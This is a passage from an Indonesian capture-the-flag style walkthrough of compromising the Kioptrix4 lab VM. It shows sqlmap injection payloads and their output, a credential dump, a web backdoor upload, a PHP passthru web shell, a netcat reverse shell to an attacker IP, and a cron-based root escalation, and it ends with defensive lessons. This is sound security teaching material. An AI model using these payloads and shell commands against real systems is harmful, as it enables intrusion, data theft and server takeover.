[08:46:33] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:46:33] [WARNING] you haven't updated sqlmap for more than 113 days!!!
[*] ending @ 08:46:33 /2020-04-23/
kali@kali:~$
Nampak bahwa database members hanya memiliki satu buah tabel yang bernama members. Selanjutnya adalah menyelidiki jumlah kolom pada tabel members (opsi -T dan opsi –columns).
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B -D members -T members --columns
___
__H__
___ ___[)]_____ ___ ___ {1.4#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:50:43 /2020-04-23/
[08:50:43] [INFO] resuming back-end DBMS 'mysql'
[08:50:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:50:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:50:43] [INFO] fetching columns for table 'members' in database 'members'
[08:50:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:50:43] [INFO] retrieved:
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[08:50:46] [INFO] retrieved: id
[08:50:47] [INFO] retrieved: int(4)
[08:50:48] [INFO] retrieved: username
[08:50:50] [INFO] retrieved: varchar(65)
[08:50:52] [INFO] retrieved: password
[08:50:54] [INFO] retrieved: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
[08:50:56] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:50:56] [WARNING] you haven't updated sqlmap for more than 113 days!!!
[*] ending @ 08:50:56 /2020-04-23/
kali@kali:~$
Berdasarkan informasi tersebut dapat disimpulkan bahwa ada tiga kolom pada tabel members, yaitu: id, username dan password. Selanjutnya kita dapat mendapatkan credential pada server Kioptrix4 (opsi -C dan opsi –dump):
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B -D members -T members -C username,password --dump
___
__H__
___ ___[.]_____ ___ ___ {1.4#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:52:25 /2020-04-23/
[08:52:25] [INFO] resuming back-end DBMS 'mysql'
[08:52:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:52:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:52:25] [INFO] fetching entries of column(s) 'password, username' for table 'members' in database 'members'
[08:52:25] [INFO] fetching number of column(s) 'password, username' entries for table 'members' in database 'members'
[08:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:52:25] [INFO] retrieved:
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
2
[08:52:28] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[08:52:31] [INFO] retrieved: robert
[08:52:33] [INFO] retrieved: MyNameIsJohn
[08:52:35] [INFO] retrieved: john
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password |
+----------+-----------------------+
| robert | ADGAdsafdfwt4gadfga== |
| john | MyNameIsJohn |
+----------+-----------------------+
[08:52:36] [INFO] table 'members.members' dumped to CSV file '/home/kali/.sqlmap/output/192.168.216.151/dump/members/members.csv'
[08:52:36] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:52:36] [WARNING] you haven't updated sqlmap for more than 113 days!!!
[*] ending @ 08:52:36 /2020-04-23/
kali@kali:~$
Kita juga dapat masuk ke dalam database untuk menggunakan query terhadap data base members (opsi –sql-shell) untuk mendapatkan informasi rahasia yang sama, yaitu isi dari kolom username dan kolom password pada tabel tersebut, yaitu:
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=a&Submit=Login' -p mypassword --sql-shell
___
__H__
___ ___[)]_____ ___ ___ {1.4#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:17:03 /2020-04-23/
[21:17:04] [INFO] resuming back-end DBMS 'mysql'
[21:17:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
[21:17:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[21:17:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
sql-shell> select * from members
[21:18:08] [INFO] fetching SQL SELECT statement query output: 'select * from members'
[21:18:08] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[21:18:08] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[21:18:08] [INFO] fetching current database
[21:18:08] [INFO] resumed: members
[21:18:08] [INFO] fetching columns for table 'members' in database 'members'
[21:18:08] [INFO] resumed: 3
[21:18:08] [INFO] resumed: id
[21:18:08] [INFO] resumed: username
[21:18:08] [INFO] resumed: password
[21:18:08] [INFO] the query with expanded column name(s) is: SELECT id, password, username FROM members
[21:18:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[21:18:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:18:08] [INFO] retrieved:
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
2
the SQL query provided can return 2 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
> a
[21:18:17] [INFO] retrieved: 1
[21:18:17] [INFO] retrieved: MyNameIsJohn
[21:18:20] [INFO] retrieved: john
[21:18:21] [INFO] retrieved: 2
[21:18:21] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[21:18:24] [INFO] retrieved: robert
select * from members [2]:
[*] 1, MyNameIsJohn, john
[*] 2, ADGAdsafdfwt4gadfga==, robert
sql-shell>
Selanjutnya, kita akan menghimpun informasi terkait system dengan menggunakan fasilitas limited shell dari sqlmap, yaitu dengan menggunakan opsi –os-shell. Kita ingin mengetahui informasi user account pada sistem operasi yang saat ini kita akses, serta menelusuri adanya program netcat pada server. Informasi yang kita himpun, saat ini kita mengakses user account bernama www-data dan fasilitas program netcat tersedia pada server.
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=a&Submit=Login' -p mypassword --os-shell
___
__H__
___ ___[,]_____ ___ ___ {1.4#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:24:51 /2020-04-23/
[21:24:51] [INFO] resuming back-end DBMS 'mysql'
[21:24:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
[21:24:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[21:24:51] [INFO] going to use a web backdoor for command prompt
[21:24:51] [INFO] fingerprinting the back-end DBMS operating system
[21:24:51] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[21:24:54] [INFO] retrieved the web server document root: '/var/www'
[21:24:54] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[21:24:54] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[21:24:55] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.216.151:80/tmpuzyph.php
[21:24:55] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[21:24:55] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] Y
[21:25:03] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.216.151:80/tmpblpkr.php
[21:25:03] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell>
os-shell> whereis nc
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz'
os-shell>
os-shell>
Dengan adanya fasilitas netcat maka kita dapat mengakses target dengan limited shell. Untuk itu kita menjalankan netcat dengan port 443 (nc -lvnp 443) pada laptop, serta menjalankan program netcat pada server Kioptrix4.
os-shell>
os-shell> /bin/nc.traditional 192.168.216.154 443 -e /bin/sh
No output
Setelah berhasil mendapatkan limited shell, maka langkah selanjutnya adalah meningkatkan hak akses sebagai root. Untuk itu kita akan membuat backdoor pada web root (/var/www), namun masalahnya saat ini kita (user account www-data) tidak punya privilege untuk itu. Namun, perlu diingat bahwa sqlmap memiliki privilege untuk membuat file pada webroot. Seharusnya kita juga bisa membuat file dengan memanfaatkan kerentanan parameter mypassword.
Untuk itu, mari kita berkesperimen membuat file pada web root menggunakan privilege dari sqlmap. Kita akan menggunakan perimeter mypassword untuk menggunakan perintah sql yaitu %27 or 1=1 INTO OUTFILE ‘/var/www/dump — –). Perintah ini akan membuat file hasil dump kolom yang telah dilakukan oleh sqlmap pada langkah sebelumnya. Perhatikan rangkaian langkah pada gambar berikut ini.
Dengan demikian kita dapat membuat backdoor sederhana pada web root. File backdoor yang akan kita buat isinya adalah <?php passthru($_GET[‘cmd’]); ?> . Selanjutnya kita menggunakan encoding ASCII HEX terhadap rangkaian perintah dalam php tersebut sebelum dikirimkan melalui burpsuite kepada server kioptrix4. Dan Alhamdulillah, file bernama backdoor.php berhasil dibuat serta berfungsi sesuai ekspektasi. Perhatikan rangkaian gambar berikut ini.
Untuk melakukan penyempurnaan terhadap backdoor, kita juga melakukan review terhadap source code checklogin.php. Script tersebut meminta tiga nilai yaitu: id, password, username. Agar perintah hanya dieksekusi hanya sekali maka penyerang membuat ‘nulls‘ ketiga nilai tersebut dengan spasi . Selanjutnya mengganti “OR” dengan “AND” sehingga selalu benar .
cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
Rangkaian gambar berikut ini (Gambar 26 hingga 28) menjelaskan pembuatan backdoor pada server Kioptrix4.
Selanjutnya kita menelusuri berbagai proses yang dijalankan dengan hak akses root. salah satunya adalah cron (lihat gambar 29). Kita akan memanfaatkan process ini untuk meningkatkan hak akses kita, yang semula www-data menjadi menjadi root.
Proses cron akan digunakan untuk mengeksekusi netcat pada korban (Kioptrix4). Perintah akan kita kirimkan dengan menggunakan burpsuite (Gambar 30). Pada sisi penyerang, kita juga mengaktifkan port 444 dengan menggunakan netcat. Setelah perintah dikirim maka proses cron berjalan di /etc/cron.d (Gambar 31).
Setelah menunggu selama satu menit cron mengeksekusi netcat untuk menghubungi kita pada port 444 yang kemudian meningkatkan hak akses kita menjadi root (Gambar 32). Dengan demikian penyerang berhasil melakukan pencurian data pada database dan menguasasi server Kioptrix4 secara keseluruhan.
Lesson Learned
Berdasarkan kisah perjalanan dalam mencari kerentanan pada server Kioptrix4, ada beberapa pelajaran yang penting diingat oleh Penyelenggara Sistem Elektronik.
Pelajaran Pertama, Hendaknya Penyelenggara Sistem Elektronik (PSE) mengadopsi best practice keamanan informasi dalam siklus pengembangan perangkat lunak atau Secure Development Life Cycle. Adanya kerentanan pada parameter myusername dan mypassword telah menyebabkan terjadinya pelanggaran data atau data breach.
Pelajaran Kedua, kecerobohan lainnya adalah terkait konfigurasi database pada MySQL, dimana Database Administrator tidak memiliki password. Dengan demikian penyerang dengan mudahnya masuk ke dalam database. Hardening infrastructure harus dilakukan secara serius dan di-review secara berkala, tidak hanya Sistem Operasi namun juga Database yang digunakan.
Kedua pelajaran berharga tersebut sangat penting untuk diperhatikan sebagai upaya pencegahan terhadap ancaman serangan siber yang dapat menyebabkan kebocoran dan pelanggaran data.
Py-Sec[dot]org 